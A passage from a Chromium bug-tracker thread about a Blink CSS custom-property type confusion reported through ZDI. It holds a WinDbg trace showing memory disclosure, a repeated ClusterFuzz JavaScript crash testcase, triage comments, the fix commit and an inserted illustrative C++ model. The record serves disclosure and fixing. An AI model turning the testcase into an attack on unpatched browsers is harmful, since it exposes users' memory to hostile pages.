00007ffd`e4e7a9de eb0c            jmp     chrome_child!MoveSmall+0x215 (00007ffd`e4e7a9ec)
00007ffd`e4e7a9e0 0f10040a        movups  xmm0,xmmword ptr [rdx+rcx]
0:000> bl
 0 e 00007ffd`e3b20b8f     0001 (0004)  0:**** chrome_child!blink::CSSPropertyParser::parseValueStart+0x57
 1 e 00007ffd`e3af62be     0001 (0001)  0:**** chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x52
 2 e 0000023f`c54531b4 r 1 0001 (0001)  0:**** 
0:000> dq 0000023f`c54531b4
0000023f`c54531b4  9c00e500`000004f2 00000004`000004f2
0000023f`c54531c4  00000001`00000003 00000000`00000000
0000023f`c54531d4  00000000`00000000 3f020000`00000000
0000023f`c54531e4  00000000`183245c5 00000000`00000000
0000023f`c54531f4  00000000`00000000 00000000`00000000
0000023f`c5453204  00000000`00000000 00000000`00000000
0000023f`c5453214  3f020000`00000000 00000000`503245c5
0000023f`c5453224  00000000`00000000 00000000`00000000
0:000> t
chrome_child!MoveSmall+0x211:
00007ffd`e4e7a9e8 4983e810        sub     r8,10h
0:000> t
chrome_child!MoveSmall+0x215:
00007ffd`e4e7a9ec 4d8bc8          mov     r9,r8
0:000> t
chrome_child!MoveSmall+0x218:
00007ffd`e4e7a9ef 49c1e904        shr     r9,4
0:000> t
chrome_child!MoveSmall+0x21c:
00007ffd`e4e7a9f3 741c            je      chrome_child!MoveSmall+0x23a (00007ffd`e4e7aa11) [br=0]
0:000> t
chrome_child!MoveSmall+0x21e:
00007ffd`e4e7a9f5 6666660f1f840000000000 nop word ptr [rax+rax]
0:000> t
chrome_child!MoveSmall+0x229:
00007ffd`e4e7aa00 0f1141f0        movups  xmmword ptr [rcx-10h],xmm0 ds:000004f2`9c0780fe=00000000000000000000000000000000
0:000> dq 000004f2`9c0780fe
000004f2`9c0780fe  00000000`00000000 00000000`00000000
000004f2`9c07810e  00000000`00000000 00000000`00000000
000004f2`9c07811e  00000000`00000000 00000000`00000000
000004f2`9c07812e  00000000`00000000 00000000`00000000
000004f2`9c07813e  00000000`00150000 00000000`00004100
000004f2`9c07814e  00000001`00138000 00000000`00004100
000004f2`9c07815e  00000002`00148000 00000000`00004100
000004f2`9c07816e  00000003`00198000 00000000`00004100
0:000> gu
chrome_child!WTF::StringBuilder::append+0x13e:
00007ffd`e220adae 44897318        mov     dword ptr [rbx+18h],r14d ds:00000012`f836bdb0=00000001
0:000> dq 000004f2`9c0780fe
000004f2`9c0780fe  9c00e500`000004f2 00000004`000004f2
000004f2`9c07810e  00000001`00000003 00000000`00000000
000004f2`9c07811e  00000000`00000000 3f020000`00000000
000004f2`9c07812e  00000000`183245c5 00000000`00000000
000004f2`9c07813e  00000000`00150000 00000000`00004100
000004f2`9c07814e  00000001`00138000 00000000`00004100
000004f2`9c07815e  00000002`00148000 00000000`00004100
000004f2`9c07816e  00000003`00198000 00000000`00004100
0:000> eu 000004f2`9c0780fe+10 "PWNED"
0:000> bp chrome_child!blink::ChromeClient::openJavaScriptAlert
0:000> gu
chrome_child!WTF::StringBuilder::append+0x96:
00007ffd`e21fcb2a 488b5c2430      mov     rbx,qword ptr [rsp+30h] ss:00000012`f836bd60=000003f69bc83a78
0:000> gu
    could step in/over inline function frames ...
03 00000012`f836bd60 00007ffd`e3af4b8f chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x8c [c:\chromium\src\third_party\webkit\source\core\css\stylepropertyserializer.cpp @ 185]
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x8c:
00007ffd`e3af62f8 488b4de0        mov     rcx,qword ptr [rbp-20h] ss:00000012`f836bda0=000004f29c0780f0
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x90:
00007ffd`e3af62fc ba3a000000      mov     edx,3Ah
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x95:
00007ffd`e3af6301 885538          mov     byte ptr [rbp+38h],dl ss:00000012`f836bdf8=20
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x98:
00007ffd`e3af6304 4885c9          test    rcx,rcx
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x9b:
00007ffd`e3af6307 742a            je      chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xc7 (00007ffd`e3af6333) [br=0]
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x9d:
00007ffd`e3af6309 8b45f0          mov     eax,dword ptr [rbp-10h] ss:00000012`f836bdb0=00000021
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xa0:
00007ffd`e3af630c 3b4104          cmp     eax,dword ptr [rcx+4] ds:000004f2`9c0780f4=00000021
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xa3:
00007ffd`e3af630f 7322            jae     chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xc7 (00007ffd`e3af6333) [br=1]
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xc7:
00007ffd`e3af6333 458bc7          mov     r8d,r15d
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xca:
00007ffd`e3af6336 488d5538        lea     rdx,[rbp+38h]
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xce:
00007ffd`e3af633a 488d4dd8        lea     rcx,[rbp-28h]
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xd2:
00007ffd`e3af633e e8354771fe      call    chrome_child!WTF::StringBuilder::append (00007ffd`e220aa78)
0:000> p
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xd7:
00007ffd`e3af6343 488d5528        lea     rdx,[rbp+28h]
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xdb:
00007ffd`e3af6347 488bcb          mov     rcx,rbx
0:000> t
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0xde:
00007ffd`e3af634a e8194ffaff      call    chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText (00007ffd`e3a9b268)
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText:
00007ffd`e3a9b268 4053            push    rbx
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x2:
00007ffd`e3a9b26a 4883ec30        sub     rsp,30h
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x6:
00007ffd`e3a9b26e 488bda          mov     rbx,rdx
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x9:
00007ffd`e3a9b271 488b5110        mov     rdx,qword ptr [rcx+10h] ds:000003f6`9bc83a88=0000000000000000
0:000> dq @rcx
000003f6`9bc83a78  00000000`00008000 0000023f`c54531a8
000003f6`9bc83a88  00000000`00000000 00000000`00000000
000003f6`9bc83a98  00000000`00000000 00000000`00000000
000003f6`9bc83aa8  00000000`00000000 00000000`00000000
000003f6`9bc83ab8  00000000`00000000 00000000`00000000
000003f6`9bc83ac8  00000000`00000000 00000000`00000000
000003f6`9bc83ad8  00000000`00000000 00000000`00000000
000003f6`9bc83ae8  00000000`00000000 00000000`00000000
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0xd:
00007ffd`e3a9b275 4885d2          test    rdx,rdx
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x10:
00007ffd`e3a9b278 7428            je      chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x3a (00007ffd`e3a9b2a2) [br=1]
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x3a:
00007ffd`e3a9b2a2 e86df177fe      call    chrome_child!WTF::emptyString (00007ffd`e221a414)
0:000> p
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x3f:
00007ffd`e3a9b2a7 488b08          mov     rcx,qword ptr [rax] ds:0000023f`c5410090=000004f29c004000
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x42:
00007ffd`e3a9b2aa 48890b          mov     qword ptr [rbx],rcx ds:00000012`f836bde8=0000000000000000
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x45:
00007ffd`e3a9b2ad 4885c9          test    rcx,rcx
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x48:
00007ffd`e3a9b2b0 7402            je      chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x4c (00007ffd`e3a9b2b4) [br=0]
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x4a:
00007ffd`e3a9b2b2 ff01            inc     dword ptr [rcx] ds:000004f2`9c004000=0000004a
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x4c:
00007ffd`e3a9b2b4 488bc3          mov     rax,rbx
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x4f:
00007ffd`e3a9b2b7 4883c430        add     rsp,30h
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x53:
00007ffd`e3a9b2bb 5b              pop     rbx
0:000> t
chrome_child!blink::CSSCustomPropertyDeclaration::customCSSText+0x54:
00007ffd`e3a9b2bc c3              ret
0:000> bl
 0 e 00007ffd`e3b20b8f     0001 (0004)  0:**** chrome_child!blink::CSSPropertyParser::parseValueStart+0x57
 1 e 00007ffd`e3af62be     0001 (0001)  0:**** chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x52
 2 e 0000023f`c54531b4 r 1 0001 (0001)  0:**** 
 3 e 00007ffd`e3cb3a94     0001 (0001)  0:**** chrome_child!blink::ChromeClient::openJavaScriptAlert
0:000> bd 0-2
0:000> g
Breakpoint 3 hit
chrome_child!blink::ChromeClient::openJavaScriptAlert:
00007ffd`e3cb3a94 4053            push    rbx
0:000> db poi(@r8)+c
000004f2`9c1a416c  3c 00 66 00 69 00 67 00-75 00 72 00 65 00 20 00  <.f.i.g.u.r.e. .
000004f2`9c1a417c  73 00 74 00 79 00 6c 00-65 00 3d 00 22 00 66 00  s.t.y.l.e.=.".f.
000004f2`9c1a418c  6c 00 6f 00 61 00 74 00-3a 00 20 00 76 00 61 00  l.o.a.t.:. .v.a.
000004f2`9c1a419c  72 00 28 00 2d 00 2d 00-43 00 43 00 43 00 43 00  r.(.-.-.C.C.C.C.
000004f2`9c1a41ac  29 00 3b 00 20 00 f2 04-00 00 00 e5 00 9c f2 04  ).;. ...........
000004f2`9c1a41bc  00 00 04 00 00 00 50 00-57 00 4e 00 45 00 44 00  ......P.W.N.E.D.
000004f2`9c1a41cc  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
000004f2`9c1a41dc  00 00 00 00 02 3f c5 45-32 18 00 00 00 00 00 00  .....?.E2.......
0:000> vertarget
Windows 10 Version 10586 MP (4 procs) Free x64
Product: WinNt, suite: SingleUserTS
kernelbase.dll version: 10.0.10586.306 (th2_release_sec.160422-1850)
Machine Name:
Debug session time: Tue Jun 14 17:57:03.575 2016 (UTC - 5:00)
System Uptime: 0 days 4:59:37.015
Process Uptime: 0 days 0:05:01.854
  Kernel time: 0 days 0:00:00.109
  User time: 0 days 0:00:00.187
```

-- CREDIT ---------------------------------------

This vulnerability was discovered by:

   62600BCA031B9EB5CB4A74ADDDD6771E working with Trend Micro's Zero Day Initiative

-- FURTHER DETAILS ------------------------------

If supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number.

Please confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 120 days of the reported date. If you are ready to release a patch at any point leading up to the deadline, please coordinate with us so that we may release our advisory detailing the issue. If the 120-day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations, so that the public can protect themselves in the absence of a patch. Please keep us updated regarding the status of this issue and feel free to contact us at any time:

Zero Day Initiative
zdi-disclosures@trendmicro.com

The PGP key used for all ZDI vendor communications is available from:

     http://www.zerodayinitiative.com/documents/disclosures-pgp-key.asc

-- INFORMATION ABOUT THE ZDI ---------------------

Established by TippingPoint and acquired by Trend Micro, the Zero Day Initiative (ZDI) neither re-sells vulnerability details nor exploit code. Instead, upon notifying the affected product vendor, the ZDI provides its Trend Micro TippingPoint customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available.

Please contact us for further details or refer to:

    http://www.zerodayinitiative.com

-- DISCLOSURE POLICY ----------------------------

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/
 

Comment 1 by zdi-disc...@hp.com, Jun 22 2016

Attachment: ZDI-CAN-3840.zip (498 bytes)

Comment 2 by ClusterFuzz, Jun 22 2016

Project Member
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=6340138707976192

Comment 3 by dominickn@chromium.org, Jun 22 2016

Cc: timloh@chromium.org
Components: Blink>CSS
Owner: alancutter@chromium.org
Status: Assigned (was: Unconfirmed)
Looks like the code in question came from crrev.com/1405293012. +alancutter and +timloh, who reviewed the CL. Can you take a look at this and verify if it's an issue?

Comment 4 by dominickn@chromium.org, Jun 22 2016

Summary: Security: Type confusion in StylePropertySerializer::getCustomPropertyText. (was: Security: )

Comment 5 by dominickn@chromium.org, Jun 24 2016

Labels: Security_Severity-Medium Security_Impact-Stable
Tentatively assigning labels

Comment 6 by dominickn@chromium.org, Jun 24 2016

Cc: -timloh@chromium.org shans@chromium.org alancutter@chromium.org
Owner: timloh@chromium.org
alancutter@ is away for the next week. Reassigning to timloh - can you have a look at this and triage?

Comment 7 by ClusterFuzz, Jun 24 2016

Project Member
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5690139632467968

Comment 8 by sheriffbot@chromium.org, Jun 24 2016

Project Member
Labels: Pri-1

Comment 9 by dominickn@chromium.org, Jun 26 2016

Labels: M-53

Comment 10 by timloh@chromium.org, Jun 27 2016

Components: Blink>Editing
mergeStyle() looks like it handles custom properties badly. Doesn't seem to repro in ToT, not sure why. Will look more into this later.

Comment 11 by timloh@chromium.org, Jun 29 2016

Cc: yosin@chromium.org

Comment 12 by yosin@chromium.org, Jul 5 2016

Labels: OS-Windows
I could reproduce this with poc2.html attached in CF Crash Report at #c7 with today's ToT.

This is DCHECK() in toCSSCustomPropertyDeclaration() call, where |property.value().m_class| is VariableReferenceClass(32) instead of CustomPropertyDeclarationClass.

I'm not sure whether VariableReferenceClass implies CustomPropertyDeclarationClass or not.


```
bool MutableStylePropertySet::setProperty(const CSSProperty& property, CSSProperty* slot)
{
    if (!removeShorthandProperty(property.id())) {
        const AtomicString& name = (property.id() == CSSPropertyVariable) ?
            toCSSCustomPropertyDeclaration(property.value())->name() : nullAtom;
```

Comment 13 by ClusterFuzz, Jul 6 2016

Project Member
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5368642518908928

Comment 14 by ClusterFuzz, Jul 6 2016

Project Member
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5368642518908928

Job Type: linux_asan_chrome_mp
Platform Id: linux

Crash Type: ASSERT
Crash Address: 
Crash State:
  !value || (value->isCustomPropertyDeclaration())
  blink::MutableStylePropertySet::setProperty
  blink::MutableStylePropertySet::addParsedProperties
  
Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=365683:366004

Minimized Testcase (0.67 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv94T5Yq8K67FKD5FPNGltSu9r7Zubq14IMGSBsv8DyCPfvpS9g3ACgRgx4s1ZjbygrfqGgzwANriIhIxmQFs7XVSR8qYrykNlJdUwNHUd-xZsec8eV4jl8nUDa2JHYxhYREWmgLIAvwnIe3B-td_L8v88kODDg?testcase_id=5368642518908928
<script> 
document.documentElement.contentEditable="true" 
document.documentElement.appendChild(document.createElement('table'))
eAcronym = document.createElement('acronym') 
document.documentElement.appendChild(eAcronym) 
document.documentElement.appendChild(document.createElement('keygen'))
newElem = document.createElement('figure') 
newElem.style.cssText = '--AAAA: var(--BBBB)' 
document.documentElement.appendChild(newElem) 
eCite = document.createElement('cite') 
eCite.style.cssText = 'float: var(--CCCC)' 
eAcronym.appendChild(eCite)
eCite.appendChild(document.createElement('marquee')); 
document.execCommand('SelectAll') 
document.execCommand('RemoveFormat') 
</script>


See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.

Comment 15 by sheriffbot@chromium.org, Jul 13 2016

Project Member
timloh: Uh oh! This issue still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 16 by sheriffbot@chromium.org, Jul 27 2016

Project Member
timloh: Uh oh! This issue still open and hasn't been updated in the last 28 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 17 by bugdroid1@chromium.org, Aug 9 2016

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/aadb63893e4c1358d1e5139aa29552eb190682c8

commit aadb63893e4c1358d1e5139aa29552eb190682c8
Author: timloh <timloh@chromium.org>
Date: Tue Aug 09 08:19:22 2016

Fix EditingStyle::mergeStyle()'s handling of custom properties

This patch fixes the logic of EditingStyle::mergeStyle() to correctly
handle custom properties. Currently it serializes the CSSValue and then
reparses it, which, aside from being inefficient, doesn't work for
custom properties as the custom property name is lost (since we only
have the enum value CSSPropertyVariable).

BUG= 622420 

Review-Url: https://codereview.chromium.org/2103043004
Cr-Commit-Position: refs/heads/master@{#410614}

[modify] https://crrev.com/aadb63893e4c1358d1e5139aa29552eb190682c8/third_party/WebKit/Source/core/core.gypi
[modify] https://crrev.com/aadb63893e4c1358d1e5139aa29552eb190682c8/third_party/WebKit/Source/core/css/StylePropertySet.cpp
[modify] https://crrev.com/aadb63893e4c1358d1e5139aa29552eb190682c8/third_party/WebKit/Source/core/editing/EditingStyle.cpp
[modify] https://crrev.com/aadb63893e4c1358d1e5139aa29552eb190682c8/third_party/WebKit/Source/core/editing/EditingStyle.h
[add] https://crrev.com/aadb63893e4c1358d1e5139aa29552eb190682c8/third_party/WebKit/Source/core/editing/EditingStyleTest.cpp
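
Added example (an editor's illustration, not Blink's code and not the patch above). The thread describes two things that a short model makes concrete. Comment 12 shows the DCHECK in toCSSCustomPropertyDeclaration() firing because the value's m_class tag is VariableReferenceClass (32), and the issue description explains what happens in a release build, where that DCHECK is compiled out: the cast goes ahead, CSSCustomPropertyDeclaration::name() reads the first field after the CSSValue header, and at that offset a CSSVariableReferenceValue keeps its CSSVariableData pointer, which is then used as an AtomicString's StringImpl*. The commit message above says why such a value ends up under CSSPropertyVariable in the first place: mergeStyle() serialized each value to text and reparsed it, and the custom property's name is not part of that text, only the enum id CSSPropertyVariable survives. The C++ below models both in one place: the tagged hierarchy with a DCHECK-only downcast, the serialize-then-reparse round trip that turns the PoC's "--AAAA: var(--BBBB)" into a CSSVariableReferenceValue, the checked cast that refuses it, and a by-value merge that keeps the name. Type names follow the report; the field layouts, the parser model (it only handles text containing var()), the std::deque arenas, the kDcheckIsOn switch and mergeStyleByValue() are assumptions of this example, not the project's actual code.

```cpp
// Added illustration for issue 622420 (not Blink's code): the names follow the report; layouts,
// parser model, demo arenas and the by-value merge are assumptions of this example.
#include <cassert>
#include <cstdint>
#include <deque>
#include <string>

constexpr bool kDcheckIsOn = false;   // false models a release build, where DCHECK compiles away
#define DCHECK(cond) do { if (kDcheckIsOn) assert(cond); } while (0)

enum ClassType : std::uint8_t { CustomPropertyDeclarationClass = 1, VariableReferenceClass = 32 };
enum CSSPropertyID { CSSPropertyFloat, CSSPropertyVariable };
struct StringImpl { std::string chars; };             // stand-in for WTF::StringImpl
struct AtomicString { StringImpl* impl; };            // stand-in: a single StringImpl*, as in WTF
struct CSSVariableData { std::string tokens; };       // stand-in for the token run behind var(...)

struct CSSValue {
    explicit CSSValue(ClassType c) : m_class(c) {}
    virtual ~CSSValue() = default;
    ClassType m_class;   // the tag inspected in comment 12 (32 == VariableReferenceClass)
    bool isCustomPropertyDeclaration() const { return m_class == CustomPropertyDeclarationClass; }
};
// "--AAAA: var(--BBBB)" is stored as this: the id is only CSSPropertyVariable, the name is in the value.
struct CSSCustomPropertyDeclaration : CSSValue {
    CSSCustomPropertyDeclaration(StringImpl* n, CSSVariableData* v)
        : CSSValue(CustomPropertyDeclarationClass), m_name{n}, m_value(v) {}
    AtomicString m_name;        // first field after the header: a StringImpl*
    CSSVariableData* m_value;
    const AtomicString& name() const { return m_name; }
};
// Any value whose text contains var(), e.g. "float: var(--CCCC)", is stored as this.
struct CSSVariableReferenceValue : CSSValue {
    explicit CSSVariableReferenceValue(CSSVariableData* d) : CSSValue(VariableReferenceClass), m_data(d) {}
    CSSVariableData* m_data;    // first field after the header: same offset as m_name above
};

// Blink-style downcast: the class check is only a DCHECK, so a release build trusts the caller.
CSSCustomPropertyDeclaration* toCSSCustomPropertyDeclaration(CSSValue* v) {
    DCHECK(!v || v->isCustomPropertyDeclaration());   // the condition in ClusterFuzz's crash state
    return static_cast<CSSCustomPropertyDeclaration*>(v);
}
// The pointer the serializer goes on to dereference as the name's StringImpl*. When v is really a
// CSSVariableReferenceValue this is the report's confused read: it yields the CSSVariableData object.
const void* nameImplSeenBySerializer(CSSValue* v) {
    return toCSSCustomPropertyDeclaration(v)->name().impl;
}
// The checked alternative: refuse the wrong class instead of reading through it.
CSSCustomPropertyDeclaration* dynamicToCSSCustomPropertyDeclaration(CSSValue* v) {
    return (v && v->isCustomPropertyDeclaration()) ? static_cast<CSSCustomPropertyDeclaration*>(v) : nullptr;
}

struct CSSProperty { CSSPropertyID id; CSSValue* value; };
static std::deque<CSSVariableData> g_dataPool;           // demo arenas: std::deque keeps
static std::deque<CSSVariableReferenceValue> g_refPool;  // addresses stable across push_back

// Parser model: it receives only the enum id and the text. Text containing var() becomes a
// CSSVariableReferenceValue whatever the id; for CSSPropertyVariable the custom property's name
// is not in the input at all, so it cannot come back out.
CSSValue* parseValue(CSSPropertyID /*id*/, const std::string& text) {
    if (text.find("var(") == std::string::npos) return nullptr;   // other value shapes not modelled
    g_dataPool.push_back(CSSVariableData{text});
    g_refPool.emplace_back(&g_dataPool.back());
    return &g_refPool.back();
}
// Pre-fix EditingStyle::mergeStyle() shape per the commit message: serialize the value's text and
// reparse it under the same id. For a custom property that yields a CSSVariableReferenceValue.
CSSProperty mergeStyleViaText(const CSSProperty& p) {
    const auto& decl = static_cast<const CSSCustomPropertyDeclaration&>(*p.value);
    return CSSProperty{p.id, parseValue(p.id, decl.m_value->tokens)};
}
// One way to keep the name (an assumption here, not the patch's exact logic): carry the CSSValue
// object across instead of round-tripping its text.
CSSProperty mergeStyleByValue(const CSSProperty& p) { return CSSProperty{p.id, p.value}; }
// The DCHECK that MutableStylePropertySet::setProperty hits on the round-tripped value.
bool setPropertyDcheckHolds(const CSSProperty& p) {
    return p.id != CSSPropertyVariable || !p.value || p.value->isCustomPropertyDeclaration();
}

struct Outcome {
    ClassType mergedClass, fixedClass;  // tag after the text round trip / after the by-value merge
    bool setPropertyDcheckHolds;        // false: ASSERT in a debug build, nothing at all in release
    bool confusedNameIsVariableData;    // the serializer's StringImpl* is really the CSSVariableData
    bool checkedCastRefuses;            // the checked cast returns null instead
    std::string fixedName;              // name after the by-value merge
};
Outcome runScenario() {
    StringImpl name{"--AAAA"};                       // constructed input mirroring the PoC's
    CSSVariableData data{"var(--BBBB)"};             // "--AAAA: var(--BBBB)" declaration
    CSSCustomPropertyDeclaration decl(&name, &data);
    CSSProperty original{CSSPropertyVariable, &decl};
    CSSProperty merged = mergeStyleViaText(original);
    CSSProperty fixed = mergeStyleByValue(original);
    const auto* ref = static_cast<const CSSVariableReferenceValue*>(merged.value);
    return Outcome{merged.value->m_class, fixed.value->m_class, setPropertyDcheckHolds(merged),
                   nameImplSeenBySerializer(merged.value) == ref->m_data,
                   dynamicToCSSCustomPropertyDeclaration(merged.value) == nullptr,
                   toCSSCustomPropertyDeclaration(fixed.value)->name().impl->chars};
}
```

runScenario() comes back with mergedClass == VariableReferenceClass and setPropertyDcheckHolds false, which is the ASSERT ClusterFuzz reported in a debug build and silence in a release build; confusedNameIsVariableData is true, meaning the pointer the serializer would dereference as a string is the CSSVariableData object, which is the disclosure path in the report; checkedCastRefuses is true because the checked cast hands back null instead; and the by-value merge keeps CustomPropertyDeclarationClass with fixedName "--AAAA". Flip kDcheckIsOn to true in a build without NDEBUG and the same call aborts at the DCHECK, which is the debug-build behaviour in the crash state above.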

Comment 18 by ClusterFuzz, Aug 10 2016

Project Member
ClusterFuzz has detected this issue as fixed in range 410604:410621.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5690139632467968

Job Type: linux_asan_chrome_mp
Platform Id: linux

Crash Type: 
Crash Address: 
Crash State:
  
Fixed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=410604:410621

Unminimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv962bJmF4zCnXnYhCsNwGmpOsoyg_7y-hF-5IruojcMrjlEiXI4QncSyk_zgZ4ntVVap84IqTY30vDXdTscTiROgCL8PhmVfYYuVq49UoyPo18gZkr8bAlg7hJt9Wv-4R2PLM7svT_iYTbe_mRGu7sWzMxHz1w?testcase_id=5690139632467968


See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.

If you suspect that the result above is incorrect, try re-doing that job on the test case report page.

Comment 19 by och...@chromium.org, Aug 10 2016

Status: Fixed (was: Assigned)
Fixed as per #18.

Comment 20 by ClusterFuzz, Aug 10 2016

Project Member
ClusterFuzz has detected this issue as fixed in range 410604:410621.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5368642518908928

Job Type: linux_asan_chrome_mp
Platform Id: linux

Crash Type: ASSERT
Crash Address: 
Crash State:
  !value || (value->isCustomPropertyDeclaration())
  blink::MutableStylePropertySet::setProperty
  blink::MutableStylePropertySet::addParsedProperties
  
Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=365683:366004
Fixed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=410604:410621

Minimized Testcase (0.67 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv94T5Yq8K67FKD5FPNGltSu9r7Zubq14IMGSBsv8DyCPfvpS9g3ACgRgx4s1ZjbygrfqGgzwANriIhIxmQFs7XVSR8qYrykNlJdUwNHUd-xZsec8eV4jl8nUDa2JHYxhYREWmgLIAvwnIe3B-td_L8v88kODDg?testcase_id=5368642518908928
<script> 
document.documentElement.contentEditable="true" 
document.documentElement.appendChild(document.createElement('table'))
eAcronym = document.createElement('acronym') 
document.documentElement.appendChild(eAcronym) 
document.documentElement.appendChild(document.createElement('keygen'))
newElem = document.createElement('figure') 
newElem.style.cssText = '--AAAA: var(--BBBB)' 
document.documentElement.appendChild(newElem) 
eCite = document.createElement('cite') 
eCite.style.cssText = 'float: var(--CCCC)' 
eAcronym.appendChild(eCite)
eCite.appendChild(document.createElement('marquee')); 
document.execCommand('SelectAll') 
document.execCommand('RemoveFormat') 
</script>


See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.

If you suspect that the result above is incorrect, try re-doing that job on the test case report page.

Comment 21 by ClusterFuzz, Aug 10 2016

Project Member
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5368642518908928

Job Type: linux_asan_chrome_mp
Platform Id: linux

Crash Type: ASSERT
Crash Address: 
Crash State:
  !value || (value->isCustomPropertyDeclaration())
  blink::MutableStylePropertySet::setProperty
  blink::MutableStylePropertySet::addParsedProperties
  
Regressed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=365683:366004
Fixed: https://cluster-fuzz.appspot.com/revisions?job=linux_asan_chrome_mp&range=410604:410621

Minimized Testcase (0.67 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv94T5Yq8K67FKD5FPNGltSu9r7Zubq14IMGSBsv8DyCPfvpS9g3ACgRgx4s1ZjbygrfqGgzwANriIhIxmQFs7XVSR8qYrykNlJdUwNHUd-xZsec8eV4jl8nUDa2JHYxhYREWmgLIAvwnIe3B-td_L8v88kODDg?testcase_id=5368642518908928
<script> 
document.documentElement.contentEditable="true" 
document.documentElement.appendChild(document.createElement('table'))
eAcronym = document.createElement('acronym') 
document.documentElement.appendChild(eAcronym) 
document.documentElement.appendChild(document.createElement('keygen'))
newElem = document.createElement('figure') 
newElem.style.cssText = '--AAAA: var(--BBBB)' 
document.documentElement.appendChild(newElem) 
eCite = document.createElement('cite') 
eCite.style.cssText = 'float: var(--CCCC)' 
eAcronym.appendChild(eCite)
eCite.appendChild(document.createElement('marquee')); 
document.execCommand('SelectAll') 
document.execCommand('RemoveFormat') 
</script>


See https://dev.chromium.org/Home/chromium-security/bugs/reproducing-clusterfuzz-bugs for more information.

Comment 22 by sheriffbot@chromium.org, Aug 10 2016

Project Member
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify

